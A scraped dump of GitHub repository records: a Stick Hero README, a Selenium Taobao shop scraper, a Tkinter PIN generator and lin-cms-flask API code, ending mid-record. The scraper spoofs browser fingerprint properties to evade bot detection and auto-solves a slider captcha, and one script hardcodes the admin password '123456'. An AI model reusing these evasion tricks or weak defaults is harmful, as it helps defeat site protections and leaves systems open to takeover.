"repo_name": "abdazmi/Stick-Hero-Automated",
"src_encoding": "UTF-8",
"text": "# Stick-Hero-Automated\nin order to play this game you need to \n1.open the game on this link below:\nhttps://www.silvergames.com/en/stick-hero\n\n2.then press play button (NOTE: it is important to put you browser on full screen before running the code)\n\n3.then press start\n4.after that you can run the code and flip your screen immoderately back to the game and enjoy watching>\n(NOTE:you should stay on the same game page while the code is running)\n\n\n"
}
] | 2 |
kskan/taobaoreptile | https://github.com/kskan/taobaoreptile | edaef94d3cadc41cfaf30c2980c79f0e4938908a | a4d1fb1257712f021c6d3b13eced11890a782492 | d3e5521e56850c330634c007f552c6ce642250e6 | refs/heads/master | 2022-12-13T11:49:47.701945 | 2020-09-11T09:13:23 | 2020-09-11T09:13:23 | 293,715,037 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5730522871017456,
"alphanum_fraction": 0.5866914391517639,
"avg_line_length": 34.829627990722656,
"blob_id": "4550d8e8289eaf2273db51a885759329b71465a4",
"content_id": "c4c3b5506d7a31366eb98e4b0ba549d7740ec19a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5496,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 135,
"path": "/app.py",
"repo_name": "kskan/taobaoreptile",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\nimport re\nimport csv\nimport os,sys\n\ndef app_path():\n \"\"\"Returns the base application path.\"\"\"\n if hasattr(sys, 'frozen'):\n # Handles PyInstaller\n return os.path.dirname(sys.executable) # 使用pyinstaller打包后的exe目录\n return os.path.dirname(__file__)\n\ndef createcsv():\n global tabel\n path = app_path()+\"/taobao.csv\"\n with open(path, 'w') as f:\n csv_write = csv.writer(f)\n csv_head = [\"id\",\"bigimg\",\"title\",\"price\",\"longimg\"]\n csv_write.writerow(csv_head)\n\ndef write_csv(data_row):\n path = app_path()+\"/taobao.csv\"\n with open(path,'a+') as f:\n csv_write = csv.writer(f)\n csv_write.writerow(data_row)\n\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n\n try:\n import unicodedata\n unicodedata.numeric(s)\n return True\n except (TypeError, ValueError):\n pass\n\n return False\n\nif __name__ == '__main__':\n # 登陆密码和账号\n print(\"——————————————欢迎使用商品爬虫————————————————\")\n print(\"1.本系统适用于现在用户在商品于兽次元商品同步问题,代码完全开源,但是请勿对其他友商进行攻击或者窃取,本系统一概不负责\")\n print(\"2.使用本系统确保您的机子有Chrome85版本,且现在已经登陆淘宝账号(稍后爬虫需要使用)\")\n print(\"3.请前往您自己的商品,所有分类(xxxxx.taobao.com/search.htm),(爬虫数据)\")\n print(\"4.爬虫中会出现chrome来回切换,请勿手动关闭,爬虫完毕会自动关闭\")\n print(\"5.爬虫完毕,后期就会出现csv文件,请从兽次元后台继续操作\")\n print(\"——————————————点击回车继续————————————————\")\n input()\n print('请输入(淘宝)账号:')\n username = input()\n print('请输入(淘宝)密码:')\n passworld = input()\n print('请输入您的店铺搜索页面:')\n url = input()\n #启动浏览器\n driver = webdriver.Chrome(executable_path=app_path()+\"/chromedriver.exe\")\n driver.maximize_window()\n driver.get(\n 'https://login.taobao.com/member/login.jhtml?redirectURL=http%3A%2F%2Ftrade.taobao.com%2Ftrade%2Fitemlist%2Flist_sold_items.htm%3Fspm%3Da313o.201708ban.category.d28.64f0197aAFB4S5%26mytmenu%3Dymbb')\n js1 = '''Object.defineProperties(navigator,{ webdriver:{ get: () => false } }) '''\n js2 = '''window.navigator.chrome = { runtime: {}, }; '''\n js3 = '''Object.defineProperty(navigator, 'languages', { get: () => ['en-US', 'en'] }); '''\n js4 = '''Object.defineProperty(navigator, 'plugins', { get: () => [1, 2, 3, 4, 5,6], }); '''\n driver.execute_script(js1)\n driver.execute_script(js2)\n driver.execute_script(js3)\n driver.execute_script(js4)\n js = \"\"\"\n document.getElementById('fm-login-id').value='{0}';\n document.getElementById('fm-login-password').value='{1}';\n document.getElementsByClassName('fm-submit')[0].click()\n \"\"\".format(username, passworld)\n driver.execute_script(js)\n try:\n element = driver.find_element_by_id('nc_1__scale_text')\n ActionChains(driver).drag_and_drop_by_offset(element, 400, 0).perform()\n time.sleep(2)\n driver.execute_script(js)\n except:\n print('无滑块')\n pass\n driver.get(url)\n # 检查页数\n pagesize = 1\n createcsv()\n # 正在查找页数\n print(\"正在查找页数\")\n pagelist = driver.find_elements_by_class_name(\"J_SearchAsync\")\n for page in pagelist:\n if is_number(page.text) and pagesize<int(page.text) :\n pagesize = int(page.text)\n for index in range(1,pagesize+1):\n print(\"现在页数:\"+str(index))\n if index is not 1:\n driver.get(url+\"?pageNo=\"+str(index))\n item = driver.find_elements_by_class_name(\"item\")\n dict = {}\n for data in item:\n datatext=data.get_attribute(\"innerHTML\")\n p= re.compile(r\"\\\"\\/\\/item.taobao.com\\/item\\.htm\\?id=(.*?)\\\"\")\n numbers= p.findall(datatext)\n def check(numbers):\n for one in numbers:\n p1 = re.compile(r\"([&][^&]+)$\")\n one = p1.sub(\"\", one)\n return one\n dict[check(numbers)]=None;\n for a in dict:\n csvlist = []\n print(\"正在获取:\"+a)\n driver.get(\"https://item.taobao.com/item.htm?id=\"+a)\n #获取大图\n image = driver.find_element_by_id(\"J_ImgBooth\")\n bigsrc = image.get_attribute(\"src\")\n title = driver.find_element_by_class_name(\"tb-main-title\")\n titlename = title.get_attribute(\"data-title\")\n price = driver.find_element_by_class_name(\"tb-rmb-num\").get_attribute(\"innerHTML\")\n csvlist.append(str(a))\n csvlist.append(bigsrc)\n csvlist.append(titlename)\n csvlist.append(price)\n longimglist = driver.find_element_by_id(\"J_DivItemDesc\")\n longimglist = longimglist.find_elements_by_tag_name(\"img\")\n for longimg in longimglist:\n csvlist.append(longimg.get_attribute(\"src\"))\n write_csv(csvlist)\n driver.close()\n print(\"数据爬虫完毕\")\n\n\n"
}
] | 1 |
paradoxmiller/PIN-Generator | https://github.com/paradoxmiller/PIN-Generator | 7a2f8d987c351c66b44356bf16c8ac5100e9b9d9 | 507e8dcd1bd4392b4e8af58fbfbb35abe0ee91ed | b4fe2beac39d6e2d1fc97e70e61f5f0ab7c4b028 | refs/heads/master | 2020-03-17T03:47:30.918250 | 2018-05-13T15:38:20 | 2018-05-13T15:38:20 | 133,250,505 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6501767039299011,
"alphanum_fraction": 0.7040635943412781,
"avg_line_length": 33.30303192138672,
"blob_id": "ea14b0b39b8ce129e0e7e85157794004aafe631f",
"content_id": "544d8ab8734463e7f0e0a01d21d6892a0aa2cb2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1132,
"license_type": "no_license",
"max_line_length": 258,
"num_lines": 33,
"path": "/pingen.py",
"repo_name": "paradoxmiller/PIN-Generator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nfrom tkinter import Tk, Label, Button\nimport os\nimport random\n\nclass PINGEN:\n\tdef __init__(self, master):\n\t\tself.master = master\n\t\tmaster.title(\"PIN Generator\")\n\n\t\tself.label = Label(master, text=\"Would you like to create a new PIN?\", font = \"Courier 20 bold\")\n\t\tself.label.pack()\n\n\t\tself.greet_button = Button(master, text=\"Generate PIN\", bg=\"#909090\",fg='red', font = \"Courier 16 bold\", padx=5, pady=5, highlightbackground='#555555',activeforeground='red',activebackground='orange',width=\"20\", relief=\"raised\", bd=\"6\", command=self.greet)\n\t\tself.greet_button.pack()\n\n\t\tself.close_button = Button(master, text=\"Exit\", bg=\"#959595\", fg='green', font = \"Courier 16 bold\", padx=5, pady=5,highlightbackground='#555555',activeforeground='green',activebackground='orange', width=\"20\", relief=\"raised\", bd=\"6\", command=master.quit)\n\t\tself.close_button.pack()\n\n\n\tdef greet(self):\n\t\tos.system('clear')\n\t\tprint(\"Generating new PIN now...\")\n\t\tmypin = random.randrange(1000,9999)\n\t\tprint(mypin)\n\n\nroot = Tk()\nmy_gui = PINGEN(root)\nroot.title(\"Four digit PIN generator\")\nroot.geometry(\"575x150+250+225\")\nroot.mainloop()\n"
},
{
"alpha_fraction": 0.7634408473968506,
"alphanum_fraction": 0.774193525314331,
"avg_line_length": 45.5,
"blob_id": "0c62636122a891832501ff033e38667ebf9874f3",
"content_id": "79ffd02ed245caa31c20929267dceef9cf4e9605",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 2,
"path": "/README.md",
"repo_name": "paradoxmiller/PIN-Generator",
"src_encoding": "UTF-8",
"text": "# PIN-Generator\nThis is a simple gui for generating a random 4 digit PIN I made just for fun\n"
}
] | 2 |
aztecman/Move37 | https://github.com/aztecman/Move37 | 31cdb9b8296a170c1d602714de46ea59c2850e51 | 9c38a9f6af243442ee07f234f98d800d1b7bbf72 | c91212736998229c303f570b6a47bd5f9537063e | refs/heads/master | 2020-03-28T17:56:34.071741 | 2018-09-27T00:02:23 | 2018-09-27T00:02:23 | 148,837,905 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6393182873725891,
"alphanum_fraction": 0.6535869836807251,
"avg_line_length": 27.670454025268555,
"blob_id": "c22cbbc34ce536857f8da1a9b553e531273fcd0b",
"content_id": "c1d448f846cdef48a265aa2623e92e7843987295",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2523,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 88,
"path": "/Documents/Move37/GridWorld101.py",
"repo_name": "aztecman/Move37",
"src_encoding": "UTF-8",
"text": "import pygame, sys\nfrom pygame.locals import *\n\n# TODO: document the code\n# TODO: add an introductory paragraph explaining the premis ie:\n# For simplicity of explanation we are starting with a optimal policy for each state\n# OR\n# For simplicity our Agent will trace back from the terminal state\n\n# TODO: post code to GITHUB\n# TODO: add a setValue function to the cell object\n# TODO: add a \"value = _\" label to each cell within the drawCell function\n# TODO: create a icon for the agent, such as a label that says 'agent'\n# TODO: code the agent moving around with a 20% chance of slipping\n\nGREEN = (0, 204, 0)\nWHITE = (255, 255, 255)\nRED = (204, 0, 0)\nTILESIZE = 80\nTILEOFFSET = 5\nBOARDWIDTH = (TILESIZE + TILEOFFSET) * 4 + TILEOFFSET\nBOARDHEIGHT = (TILESIZE + TILEOFFSET) * 3 + TILEOFFSET + 40\n\nclass Cell:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n \n self.reward_state = False\n self.punish_state = False\n self.color = WHITE\n \n def coordinates(self):\n return self.x, self.y\n \n def drawCell(self, x_coord, y_coord):\n x_pixel = coordToPixelSpace(x_coord)\n y_pixel = coordToPixelSpace(y_coord)\n pygame.draw.rect(DISPLAYSURF, self.color, (x_pixel, y_pixel, TILESIZE, TILESIZE))\n\n def getColor(self):\n return self.color\n \n def setPunish(self):\n self.color = RED\n self.punish_state = True\n\n def setReward(self):\n self.color = GREEN\n self.reward_state = True\n \ndef coordToPixelSpace(coord):\n pixelPosition = TILEOFFSET + coord*(TILESIZE + TILEOFFSET)\n return pixelPosition\n\ndef terminate():\n pygame.quit()\n sys.exit()\n \ndef checkForQuit():\n for event in pygame.event.get(QUIT): # get all the QUIT events\n terminate() # terminate if any QUIT events are present\n for event in pygame.event.get(KEYUP): # get all the KEYUP events\n if event.key == K_ESCAPE:\n terminate() # terminate if the KEYUP event was for the Esc key\n pygame.event.post(event) # put the other KEYUP event objects back\n\n\n \ncell_list = []\nfor i in range(4):\n for j in range(3):\n cell_list.append(Cell(i, j))\n\ncell_list[9].setReward()\ncell_list[10].setPunish()\ndel cell_list[4]\n\npygame.init()\nDISPLAYSURF = pygame.display.set_mode((BOARDWIDTH, BOARDHEIGHT))\n\nfor i in range(len(cell_list)):\n cell_list[i].drawCell(cell_list[i].coordinates()[0], cell_list[i].coordinates()[1])\n\npygame.display.update()\n\nwhile True:\n checkForQuit()\n"
}
] | 1 |
alex-chan/raspalex | https://github.com/alex-chan/raspalex | 11801aa03e2289d013ad4423b166e8396061d3a6 | 2b792d1dbbf9f02f2fc9a84dfd892ac441c0ab10 | 2fd81db2313a38da5daf1290434a4446649cc236 | refs/heads/master | 2021-01-15T15:32:38.928801 | 2016-09-04T08:09:59 | 2016-09-04T08:09:59 | 64,921,353 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5400755405426025,
"alphanum_fraction": 0.5518254041671753,
"avg_line_length": 29.1645565032959,
"blob_id": "ecf3f8de0c4e277be17749c427fa56c98601de4a",
"content_id": "b63231618357f9165e528d5d64e62850516bcd28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4766,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 158,
"path": "/polite_alex.py",
"repo_name": "alex-chan/raspalex",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf8 -*-\n# filename: PoliteAlex\n# author: alexchen\n# date: 2/9/2016\n# All copyright reserved to xsunset\n# ---------------------------------\nfrom __future__ import absolute_import, division, print_function, \\\n with_statement\n\nimport time\nimport subprocess\nfrom facepp import API, File\nimport pygame\n\n\nAPI_KEY = '2d0df4c56a364d82eed3d1a238950ffb'\nAPI_SECRET = 'QovGDvkrsfOjY_ncbvT7ItprS6Af7gZZ'\napi = API(API_KEY, API_SECRET)\n\nMASTER = 'Alex'\nFRIEND = 'Lizi'\nTHREDHOLD = 30\n\nclass PoliteAlex(object):\n last_path = None\n def __init__(self):\n pygame.mixer.init()\n\n def _is_someone(regn, person_name):\n return regn['person_name'] == person_name and regn['confidence'] > THREDHOLD\n\n def capture_still_image(self):\n return \"imgs/test1.jpg\"\n t = time.strftime(\"%Y%m%d_%H%M%S\")\n path = \"imgs/%s.jpg\" % t\n popen = subprocess.Popen(['raspistill','-vf', '-w','200','-h','200','-o',path])\n ret = popen.communicate()\n return path\n\n def is_screen_changed(self, new_path, old_path):\n return True\n\n def is_somebody_in_picture(self, path):\n return True\n\n def recognize_with_facepp(self, path):\n\n # rst = api.recognition.identify(group_name = 'test', url = TARGET_IMAGE)\n rst = api.recognition.identify(group_name = 'saladgroup', img = File(path))\n print('recognition result', rst)\n print('=' * 60)\n if len(rst['face']) > 0 and len(rst['face'][0]['candidate']) > 0:\n print('The person with highest confidence:', \\\n rst['face'][0]['candidate'][0]['person_name'])\n return rst\n\n def is_only_master_in_picture(self, regn):\n if len(regn['face']) > 1 :\n return False\n\n if len(regn['face']) > 0:\n if len(regn['face'][0]['candidate']) > 0:\n return self._is_someone(regn['face'][0]['candidate'], MASTER)\n\n return False\n\n def is_friend(self, regn):\n if len(regn['face']) < 1 :\n return False\n\n faces = regn['face']\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n return self._is_someone(candicates[0], FRIEND)\n\n return False\n\n def is_only_stranger_in_picture(self, regn):\n if len(regn['face']) < 1 :\n return False\n\n faces = regn['face']\n is_stranger = True\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n if self._is_someone(candicates[0], MASTER) or self._is_someone(candicates[0], FRIEND):\n print('is stranger')\n is_stranger = False\n break\n\n return is_stranger\n\n def is_master_with_others(self, regn):\n if len(regn['face']) <= 1 :\n return False\n faces = regn['face']\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n if self._is_someone(candidates[0], MASTER):\n return True\n\n return False\n\n def welcome_master_with_others(self):\n pygame.mixer.music.load(\"res/welcome_friends.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def welcome_friend(self):\n pygame.mixer.music.load(\"res/welcome_friends.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def welcome_master(self):\n pygame.mixer.music.load(\"res/welecomehome_master.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def yield_at_stranger(self):\n pygame.mixer.music.load(\"res/yield_at_stranger.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n\n def run_forever(self):\n while True:\n path = self.capture_still_image()\n changed = self.is_screen_changed(path, self.last_path)\n if not changed:\n # Sleep\n continue\n sb = self.is_somebody_in_picture(path)\n if not sb:\n # Sleep\n continue\n\n ret = self.recognize_with_facepp(path)\n if self.is_master_with_others(ret):\n self.welcome_master_with_others()\n elif self.is_friend(ret):\n self.welcome_friend()\n elif self.is_only_master_in_picture(ret):\n self.welcome_master()\n elif self.is_only_stranger_in_picture(ret):\n self.yield_at_stranger()\n\n\nif __name__ == \"__main__\":\n alex = PoliteAlex()\n alex.run_forever()\n"
},
{
"alpha_fraction": 0.6507936716079712,
"alphanum_fraction": 0.6603174805641174,
"avg_line_length": 19.322580337524414,
"blob_id": "1253141b935fae187d27e6eedfb7214bb5cbe8b1",
"content_id": "6ce6a89a8d73f2e53d7b54c5e4ccb739c8624561",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 630,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 31,
"path": "/README.md",
"repo_name": "alex-chan/raspalex",
"src_encoding": "UTF-8",
"text": "RaspAlex - A program set that make my raspberry pi act like a baby/pet finally.\n==========================================\n\n\nPolite Alex - In progressing\n----------\n\nAlex will greet you when recognize you everyday morning/night\n\n### Hardware requirements\n1. raspberry-compatible camera\n2. loudspeaker\n\n\nHardworking Alex - TODO\n----------------\n\nAlex can help you turn on/off TV, air conditioner etc.\n\n### Hardware requirements\n1. high quality microphones.\n2. infrared LEDs\n\nNaughty Alex - TODO\n--------------------\n\nAlex can move around according to your command or self-decision.\n\n### Hardware requirements\n1. vehicles\n2. motors\n"
}
] | 2 |
hello3306/lin-cms-flask | https://github.com/hello3306/lin-cms-flask | 1b502add47a6258229fa971d08221137fbe4dd4e | db98f838323baf476cded0578df65651fb64ce74 | 86679e5c14e66aa126d27e3fc77e172a9a908f12 | refs/heads/master | 2022-12-14T00:10:54.212042 | 2019-03-08T09:32:11 | 2019-03-08T09:32:11 | 174,481,130 | 1 | 0 | MIT | 2019-03-08T06:24:52 | 2019-08-12T07:12:43 | 2022-12-08T01:40:58 | Python | [
{
"alpha_fraction": 0.668789803981781,
"alphanum_fraction": 0.6942675113677979,
"avg_line_length": 16.44444465637207,
"blob_id": "1fd98f82fd6f51c2e145db9a327119803cfe00ff",
"content_id": "06fbdb7be81d687974e23038f68cb01523378e3c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 379,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 18,
"path": "/app/config/setting.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom datetime import timedelta\n\n# 分页配置\nCOUNT_DEFAULT = 10\nPAGE_DEFAULT = 0\n\n# 令牌配置\nJWT_ACCESS_TOKEN_EXPIRES = timedelta(hours=1)\n\n# 插件模块暂时没有开启,以下配置可忽略\n# plugin config写在字典里面\nBP_URL_PREFIX = '/plugin'\nPLUGIN_PATH = {}\n"
},
{
"alpha_fraction": 0.6111111044883728,
"alphanum_fraction": 0.6111111044883728,
"avg_line_length": 11,
"blob_id": "72c57173ae5fce81f12ddcfae6b2e35024342ff0",
"content_id": "2817530b81c96fe1fea4bef54bd70744db13db3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 144,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 12,
"path": "/app/api/v1/user.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n Hello \n\n\"\"\"\nfrom lin.redprint import Redprint\n\napi = Redprint('user')\n\n\[email protected]('', methods=['POST'])\ndef get_user():\n return 'user'\n"
},
{
"alpha_fraction": 0.6494325399398804,
"alphanum_fraction": 0.6595208048820496,
"avg_line_length": 20.432432174682617,
"blob_id": "2eb1b302f3b8162828136e0f1beac94c9380c447",
"content_id": "4ebe4aa0283d543b6b36cf00117dc4ae1fae7fc3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 806,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 37,
"path": "/app/app.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom lin import Lin\n\n\ndef register_blueprints(app):\n from app.api.v1 import create_v1\n from app.api.cms import create_cms\n app.register_blueprint(create_v1(), url_prefix='/v1')\n app.register_blueprint(create_cms(), url_prefix='/cms')\n\n\ndef apply_cors(app):\n CORS(app)\n\n\ndef create_tables(app):\n from lin.db import db\n with app.app_context():\n db.create_all()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object('app.config.setting')\n app.config.from_object('app.config.secure')\n register_blueprints(app)\n Lin(app)\n apply_cors(app)\n # 创建所有表格\n create_tables(app)\n return app\n"
},
{
"alpha_fraction": 0.6592382788658142,
"alphanum_fraction": 0.6616693735122681,
"avg_line_length": 29.09756088256836,
"blob_id": "7b7b8a9aba34bbb13b601dc9d137f7de643f3ab8",
"content_id": "a289fa05ec63839b87b348a7194a4c8f0b01f6eb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2601,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 82,
"path": "/app/api/cms/notify.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\nimport time\n\nfrom flask import Response, jsonify\nfrom flask_jwt_extended import get_current_user\n\nfrom lin import db\nfrom lin.core import route_meta, Event\nfrom lin.exception import NotFound, Success\nfrom lin.jwt import group_required, admin_required\nfrom lin.redprint import Redprint\nfrom lin.notify import MESSAGE_EVENTS\nfrom lin.sse import sser\nfrom app.validators.forms import EventsForm\n\nnotify_api = Redprint('notify')\n\n\n@notify_api.route('/', methods=['GET'], strict_slashes=False)\n@route_meta(auth='消息推送', module='推送', mount=False)\n@group_required\ndef stream():\n return Response(\n event_stream(),\n mimetype=\"text/event-stream\",\n headers=[('Cache-Control', 'no-cache'), ('Connection', 'keep-alive')]\n )\n\n\n@notify_api.route('/events', methods=['GET'])\n@route_meta(auth='获得events', module='推送', mount=False)\n@group_required\ndef get_events():\n current_user = get_current_user()\n if current_user.is_super:\n return jsonify({'events': list(MESSAGE_EVENTS)})\n event = Event.query.filter_by(group_id=current_user.group_id, soft=False).first()\n if event is None:\n raise NotFound(msg='当前用户没有推送项')\n events = event.message_events.split(',')\n return jsonify({'events': events})\n\n\n@notify_api.route('/events', methods=['POST'])\n@route_meta(auth='创建events', module='推送', mount=False)\n@admin_required\ndef create_events():\n form = EventsForm().validate_for_api()\n event = Event.query.filter_by(group_id=form.group_id.data, soft=False).first()\n if event:\n raise NotFound(msg='当前权限组已存在推送项')\n with db.auto_commit():\n ev = Event()\n ev.group_id = form.group_id.data\n ev.message_events = ','.join(form.events.data)\n return Success(msg='创建成功')\n\n\n@notify_api.route('/events', methods=['PUT'])\n@route_meta(auth='更新events', module='推送', mount=False)\n@admin_required\ndef put_events():\n form = EventsForm().validate_for_api()\n event = Event.query.filter_by(group_id=form.group_id.data, soft=False).first()\n if event is None:\n raise NotFound(msg='当前权限组不存在推送项')\n with db.auto_commit():\n event.message_events = ','.join(form.events.data)\n return Success(msg='更新成功')\n\n\ndef event_stream():\n while True:\n if sser.exit_message():\n yield sser.pop()\n else:\n yield sser.heartbeat()\n # 每个5秒发送一次心跳\n time.sleep(5)\n"
},
{
"alpha_fraction": 0.65457683801651,
"alphanum_fraction": 0.6566494107246399,
"avg_line_length": 29.473684310913086,
"blob_id": "92304c0acd26b927f024ecf275e73c61df476c3e",
"content_id": "46bdddb27983e6e1cc244c90670f8883ed398a72",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3350,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 95,
"path": "/app/api/v1/book.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n a standard CRUD template of book\n 通过 图书 来实现一套标准的 CRUD 功能,供学习\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\nfrom lin import db, route_meta, group_required\nfrom lin.redprint import Redprint\nfrom flask import jsonify\nfrom lin.exception import NotFound, ParameterException, Success\n\nfrom app.libs.error_code import BookNotFound\nfrom app.models.book import Book\nfrom app.validators.forms import BookSearchForm, CreateOrUpdateBookForm\n\napi = Redprint('book')\n\n\[email protected]('/<id>', methods=['GET'])\ndef get_book(id):\n book = Book.query.filter_by(id=id).first() # 通过Book模型在数据库中查询id=`id`的书籍\n if book is None:\n raise NotFound(msg='没有找到相关书籍') # 如果书籍不存在,返回一个异常给前端\n return jsonify(book) # 如果存在,返回该数据的信息\n\n\[email protected]('/', methods=['GET'])\ndef get_books():\n books = Book.query.filter_by(delete_time=None).all()\n if books is None or len(books) < 1:\n raise NotFound(msg='没有找到相关书籍')\n return jsonify(books)\n\n\[email protected]('/search', methods=['GET'])\ndef search():\n form = BookSearchForm().validate_for_api()\n q = '%' + form.q.data + '%'\n books = Book.query.filter(Book.title.like(q)).all()\n if books is None or len(books) < 1:\n raise BookNotFound()\n return jsonify(books)\n\n\[email protected]('/', methods=['POST'])\ndef create_book():\n form = CreateOrUpdateBookForm().validate_for_api() # 校验参数\n book = Book.query.filter_by(title=form.title.data).filter(Book.delete_time == None).first() # 避免同名图书\n if book is not None:\n raise ParameterException(msg='图书已存在')\n # 新增图书\n with db.auto_commit():\n new_book = Book()\n new_book.title = form.title.data\n new_book.author = form.author.data\n new_book.summary = form.summary.data\n new_book.image = form.image.data\n db.session.add(new_book)\n return Success(msg='新建图书成功')\n\n\[email protected]('/<id>', methods=['PUT'])\n@route_meta(auth='更新图书', module='图书')\n@group_required\ndef update_book(id):\n form = CreateOrUpdateBookForm().validate_for_api() # 校验参数\n book = Book.query.filter_by(id=id).first() # 通过Book模型在数据库中查询id=`id`的书籍\n if book is None:\n raise NotFound(msg='没有找到相关书籍') # 如果书籍不存在,返回一个异常给前端\n # 更新图书\n with db.auto_commit():\n book.title = form.title.data\n book.author = form.author.data\n book.summary = form.summary.data\n book.image = form.image.data\n return Success(msg='更新图书成功')\n\n\[email protected]('/<id>', methods=['DELETE'])\n@route_meta(auth='删除图书', module='图书')\n@group_required\ndef delete_book(id):\n book = Book.query.filter_by(id=id).first() # 通过Book模型在数据库中查询id=`id`的书籍\n if book is None:\n raise NotFound(msg='没有找到相关书籍') # 如果书籍不存在,返回一个异常给前端\n # 删除图书,软删除\n book.delete(commit=True)\n return Success(msg='删除图书成功')\n\n\[email protected]('/<id>', methods=['GET'])\n@route_meta(auth='图书详情', module='图书')\n@group_required\ndef get_one_book(id):\n pass\n"
},
{
"alpha_fraction": 0.6558139324188232,
"alphanum_fraction": 0.6883720755577087,
"avg_line_length": 27.66666603088379,
"blob_id": "c3737cb3250d7f18177733fd7b3b62ce84a1aeb2",
"content_id": "44b5f5957f7d8256cc4b6d1ea92ba366e7491127",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 435,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 15,
"path": "/app/models/book.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\nfrom sqlalchemy import Column, String, Integer\n\nfrom lin.interface import InfoCrud as Base\n\n\nclass Book(Base):\n id = Column(Integer, primary_key=True, autoincrement=True)\n title = Column(String(50), nullable=False)\n author = Column(String(30), default='未名')\n summary = Column(String(1000))\n image = Column(String(50))\n"
},
{
"alpha_fraction": 0.5762004256248474,
"alphanum_fraction": 0.5908141732215881,
"avg_line_length": 22.950000762939453,
"blob_id": "dfab532effa23199d723169b8b975098e0f123cf",
"content_id": "64fa9de99cb72d022d03b72a6f33fdabca3e4409",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 20,
"path": "/add_super.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom app.app import create_app\nfrom lin.db import db\nfrom lin.core import User\n\napp = create_app()\nwith app.app_context():\n with db.auto_commit():\n # 创建一个超级管理员\n user = User()\n user.nickname = 'super'\n user.password = '123456'\n user.email = '[email protected]'\n # super为 2 的时候为超级管理员,普通用户为 1\n user.super = 2\n db.session.add(user)\n"
},
{
"alpha_fraction": 0.6091954112052917,
"alphanum_fraction": 0.6551724076271057,
"avg_line_length": 20.75,
"blob_id": "a47ee4877584282ffc73d73cad5598adf86d45c7",
"content_id": "510abda39dfb0df483e3ff0a9c7e87d63ba69a5e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 304,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 12,
"path": "/app/libs/error_code.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
